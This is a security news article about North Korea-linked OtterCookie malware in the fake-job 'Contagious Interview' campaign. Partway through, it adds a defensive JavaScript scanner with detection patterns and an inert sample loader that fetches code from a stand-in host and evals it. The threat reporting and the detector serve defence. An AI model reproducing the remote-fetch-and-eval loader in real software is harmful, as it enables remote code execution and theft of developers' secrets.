North Korea-linked threat actors have been identified using a new malware strain known as OtterCookie in a campaign dubbed Contagious Interview. This scheme specifically targets the software developer community by enticing them with fake job offers. Although the campaign was initially documented by Palo Alto Networks researchers in November 2023, evidence suggests that it has been operational since December 2022. The primary goal of these attacks appears to be financial gain, rather than specific targeting of individuals or organizations.
Recent developments in the Contagious Interview campaign reveal that since November 2024, threat actors have incorporated the OtterCookie malware alongside previously utilized tools such as BeaverTail and InvisibleFerret. According to a report published by NTT, the introduction of OtterCookie marks a significant evolution in the attackers’ tactics. The report states that “…SOC has observed the execution of malware other than BeaverTail and InvisibleFerret in the Contagious Interview campaign.” This ongoing evolution underscores the relentless nature of cyber threats and the importance of staying informed about emerging malware trends.
The attack chain begins with the distribution of malicious Node.js projects or npm packages through platforms such as GitHub or Bitbucket. More recently, the attackers have also shipped applications built with Qt or Electron, showing a willingness to try new delivery techniques. OtterCookie loaders retrieve JSON data from a remote source and execute it as JavaScript. In other cases the loader downloads JavaScript directly, and control is transferred to a catch block when the server responds with an HTTP 500 status code.
The earliest sightings of OtterCookie date back to November 2024, although security experts suspect that the malware may have been active as early as September 2024 with minor variations in implementation. The November version of OtterCookie utilizes Socket.IO for communication and can execute remote commands through the socketServer function. These commands include activities such as executing shell commands and exfiltrating device information. Notably, threat actors have employed shell commands like ‘ls’ and ‘cat’ to search for cryptocurrency wallet keys within specific files, which are subsequently sent to a remote server for analysis.
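The loader traits described in the two paragraphs above (remote JSON fetched and run as JavaScript, execution routed through a catch block on HTTP 500, Socket.IO for command and control) can be turned into a triage heuristic for JavaScript pulled from a suspicious npm package or repository. The following scanner is an added example written for this article, not code from NTT's report or from the malware; the signal names, the regular expressions and both sample sources are constructed assumptions.

```javascript
// Added example (not from the article or from NTT's report): a heuristic
// triage scanner for JavaScript source taken from a suspicious npm project.
// It looks for the loader traits the article describes: a remote fetch whose
// result reaches eval()/new Function(), dynamic execution inside a catch
// block, a branch on HTTP status 500, and Socket.IO client usage. These are
// review signals, not proof of compromise; benign code can trip single ones.
const SIGNALS = [
  { id: "remote-fetch",      re: /\b(?:fetch|axios\.(?:get|post)|https?\.(?:get|request))\s*\(/ },
  { id: "dynamic-eval",      re: /\b(?:eval|Function)\s*\(/ },
  { id: "eval-in-catch",     re: /catch\s*\([^)]*\)\s*\{[^}]*\b(?:eval|Function)\s*\(/ },
  { id: "status-500-branch", re: /\.status\s*={2,3}\s*500\b/ },
  { id: "socket-io",         re: /require\(\s*["']socket\.io-client["']\s*\)|from\s+["']socket\.io-client["']/ },
];

// Returns the ids of every signal present in a source string, in SIGNALS order.
function scanSource(source) {
  return SIGNALS.filter((s) => s.re.test(source)).map((s) => s.id);
}

// A remote fetch paired with dynamic code execution is the core loader shape;
// the remaining signals raise the priority of a manual review.
function triage(source) {
  const hits = scanSource(source);
  const loaderShape = hits.includes("remote-fetch") && hits.includes("dynamic-eval");
  return { hits, verdict: loaderShape ? "review" : "ok" };
}

// Constructed, inert sample that mirrors the described loader shape. It is only
// scanned as text and never executed; example.invalid is a reserved hostname.
const SAMPLE_LOADER = `
const io = require("socket.io-client");
async function start() {
  try {
    const res = await axios.get("https://example.invalid/config.json");
    if (res.status === 500) throw new Error("server error");
    eval(res.data.payload);
  } catch (e) {
    eval(e.message);
  }
}`;

// Constructed benign sample: an ordinary Express app trips none of the signals.
const SAMPLE_BENIGN = `
const express = require("express");
const app = express();
app.get("/", (req, res) => res.json({ status: "ok" }));
app.listen(3000);`;
```

In practice you would read each .js file of the package and pass its contents to triage(), then review anything marked "review" by hand.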
In light of these developments, experts advise caution as the Contagious Interview campaign shows no signs of slowing down and is continuously updating its attack methods. Incidents related to this campaign have also been reported in Japan, underscoring the global reach of these threat actors. The report provides crucial Indicators of Compromise (IoCs) to assist organizations in identifying and mitigating potential threats associated with OtterCookie and related malware.
For the latest updates on cybersecurity threats and trends, follow SecurityAffairs on Twitter, Facebook, and Mastodon. You can also connect with Pierluigi Paganini, the author of the original report, on LinkedIn for more insights into the world of hacking and malware. Stay informed and stay secure in an ever-evolving digital landscape.
Original Post URL: https://securityaffairs.com/172382/malware/north-korea-linked-actors-using-ottercookie-backdoor.html
Category & Tags: APT, Breaking News, Hacking, Malware, Contagious Interview, Information Security News, IT Information Security, North Korea, OtterCookie, Pierluigi Paganini, Security News